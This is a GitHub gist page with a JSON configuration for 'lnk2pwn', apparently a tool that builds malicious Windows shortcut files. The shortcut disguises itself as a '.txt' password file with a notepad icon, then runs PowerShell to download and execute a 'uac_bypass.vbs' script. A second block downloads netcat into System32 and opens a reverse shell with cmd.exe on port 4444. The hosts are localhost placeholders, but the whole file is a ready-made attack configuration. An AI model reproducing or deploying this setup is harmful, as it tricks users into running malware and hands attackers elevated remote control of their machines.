Created
April 25, 2018 16:53
-
-
Save tommelo/6852d303498403f80e889f3f7a3e7105 to your computer and use it in GitHub Desktop.
lnk2pwn shortcut config
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "shortcut": { | |
| "target_path": "C:\\Windows\\System32\\cmd.exe", | |
| "working_dir": "C:\\Windows\\System32", | |
| "arguments": "/c powershell.exe iwr -outf %tmp%\\p.vbs http://127.0.0.1/uac_bypass.vbs & %tmp%\\p.vbs", | |
| "icon_path": "C:\\Windows\\System32\\notepad.exe", | |
| "icon_index": null, | |
| "window_style": "MINIMIZED", | |
| "description": "TRUST ME", | |
| "fake_extension": ".txt", | |
| "file_name_prefix": "password" | |
| }, | |
| "elevated_uac": { | |
| "file_name": "uac_bypass.vbs", | |
| "cmd": "cmd.exe /c powershell.exe -nop -w hidden iwr -outf C:\\Windows\\System32\\nc.exe http://127.0.0.1/nc.exe & C:\\Windows\\System32\\nc.exe 127.0.0.1 4444 -e cmd.exe" | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment